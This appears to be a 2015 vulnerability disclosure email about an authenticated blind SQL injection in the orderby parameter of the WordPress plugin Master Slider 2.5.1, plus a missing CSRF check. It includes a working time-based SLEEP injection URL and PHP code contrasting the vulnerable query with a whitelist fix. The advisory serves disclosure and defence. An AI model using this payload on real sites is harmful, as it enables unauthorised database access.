Subject: Blind SQL injection in Master Slider 2.5.1
Date: Thu, 20 Aug 2015 11:25:22 +0200

Hello,

Plugin: Master Slider 2.5.1 https://wordpress.org/plugins/master-slider/

1. Blind SQL injection (MSP_DB::ms_query)

Authenticated users (e.g. editors) can execute arbitrary SQL statements. The admin page also has no CSRF protection, so the request can be forged on behalf of a logged-in user.

Method: GET
Url: http://localhost/wp-admin/admin.php?page=master-slider&orderby=[sqli]
Vulnerable parameters: orderby

Example PHP callstack:
/master-slider/admin/views/slider-dashboard/list-sliders.php:6
MSP_List_Table::prepare_items   [/master-slider/admin/includes/classes/class-msp-list-table.php:186]
MSP_List_Table::get_total_count   [/master-slider/admin/includes/classes/class-msp-list-table.php:166]
MSP_List_Table::get_records   [/master-slider/admin/includes/classes/class-msp-list-table.php:159]
MSP_DB::get_sliders   [/master-slider/includes/classes/class-msp-db.php:552]
MSP_DB::get_sliders_list   [/master-slider/includes/classes/class-msp-db.php:534]
MSP_DB::ms_query   [/master-slider/includes/classes/class-msp-db.php:509]
wpdb::get_results

Verification (the response is delayed by about 5 seconds when the injected SLEEP executes, which is what makes the injection detectable even though no query output is shown):
http://localhost/wp-admin/admin.php?page=master-slider&orderby=(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)--%20-
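As an added illustration (this is not the plugin's code and not a patch for it): the unsafe ORDER BY construction that the call stack above points at, next to a whitelist-based fix, exercised with the verification payload. The table and column names and the list of sortable columns are assumptions.

```php
<?php
// Added example, not code from Master Slider. Table/column names are assumed.

// VULNERABLE pattern: the request value is pasted straight into ORDER BY.
// $wpdb->prepare() cannot help here, because column names and clauses are
// not bindable placeholders; whatever is in ?orderby= becomes part of the SQL.
function build_sliders_query_vulnerable(array $request): string {
    $orderby = isset($request['orderby']) ? (string) $request['orderby'] : 'ID';
    $order   = isset($request['order'])   ? (string) $request['order']   : 'ASC';
    return "SELECT * FROM wp_masterslider_sliders ORDER BY {$orderby} {$order}";
}

// FIXED pattern: map the request value onto a fixed set of column names and
// sort directions. The raw input never reaches the query; unknown values fall
// back to the default column.
const SLIDER_ORDERBY_COLUMNS = [
    'ID'           => 'ID',
    'title'        => 'title',
    'date_created' => 'date_created',
];

function build_sliders_query_safe(array $request): string {
    $key    = isset($request['orderby']) ? (string) $request['orderby'] : 'ID';
    $column = SLIDER_ORDERBY_COLUMNS[$key] ?? 'ID';          // whitelist lookup
    $order  = (isset($request['order']) && strtoupper((string) $request['order']) === 'DESC')
        ? 'DESC' : 'ASC';                                     // only the two literals
    return "SELECT * FROM wp_masterslider_sliders ORDER BY `{$column}` {$order}";
}

// The advisory's verification payload, URL-decoded.
$payload = '(SELECT * FROM (SELECT SLEEP(5))XXX)-- -';

// The vulnerable builder emits the subquery as the ORDER BY expression and the
// "-- -" comment swallows the trailing direction; the safe builder sorts by ID.
echo build_sliders_query_vulnerable(['orderby' => $payload]), PHP_EOL;
echo build_sliders_query_safe(['orderby' => $payload]), PHP_EOL;
```

Run it with `php` on the command line: the first line printed is the query the database actually receives for the verification URL, the second is what a whitelisted version would send. In the WordPress context the list page should additionally require a nonce (wp_nonce_url() when building the links, check_admin_referer() when handling the request) so that the request cannot be forged through a logged-in editor; the whitelist removes the injection independently of that.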

--
Regards,
Marcin Probola,